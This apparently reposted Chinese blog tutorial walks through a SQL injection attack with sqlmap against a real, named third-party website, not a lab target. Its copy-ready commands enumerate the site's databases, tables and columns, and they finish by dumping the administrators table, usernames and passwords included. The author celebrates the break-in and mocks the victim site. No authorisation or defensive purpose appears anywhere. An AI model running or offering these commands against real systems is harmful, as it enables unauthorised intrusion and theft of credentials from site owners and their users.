sqlmap的应用实战

来源：互联网发布：嵌入式与单片机的关系编辑：程序博客网时间：2024/04/28 23:56

今天有幸在kali中文网上查看了很多大神写的sqlmap的教程，其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结，给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤，啊，不，是拖库。。。。。

1.首先要知道可以注入的网址是什么

http：//www.bible-history.com/subcat.php?id=2

2.接着就可以针对这个网址来检测能不能注入，以及查看它的所有数据库列表了

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" --dbs (注意：dbs前面是两个横杠)

注入的结果表示：

（1）注入参数id为GET注入，注入类型有四种，分别是：boolean-based blind/error-based/time-based blind/union query

（2）web应用程序技术为：Apache PHP

（3）数据库类型：MySQL

（4）画红圈的是网址所有的数据库名单

其中可能有你输入[Y/N]的，统统回车解决吧。

3.这时，我们发现这个网址存在注入，并且拿到了所有数据库名单。我们决定查看web当前使用的数据库

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" --current-db

红线画出的就是当前使用的数据库：bible_history，一会我们会针对这个数据库下手。。。

4.探测web数据库使用的账号

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" --current-user

可见当前的数据库使用账户为：bho@localhost

5.下面我们来探测bible_history这个数据库里的所有表

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" -D bible_history --tables

其中：

（1）D指出数据库名字

（2）tables列出表

6.下面我想探测的是administrators这个表的列

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns

其中：

（1）T指定要列出字段的表

（2）columns列出列

7.表中字段明显拿到了。。。。下面一步还用说么？果断脱裤。。。。好开心。。。。

sqlmap -u "http：//www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump

成功！！！

（PS：自从逛了大神技术贴，就再也不能好好说“拖库”了。。。满脑子都是给web脱裤。。。。我天朝的男程序员们就是如此闷骚阔爱）认真脸。。。

0 0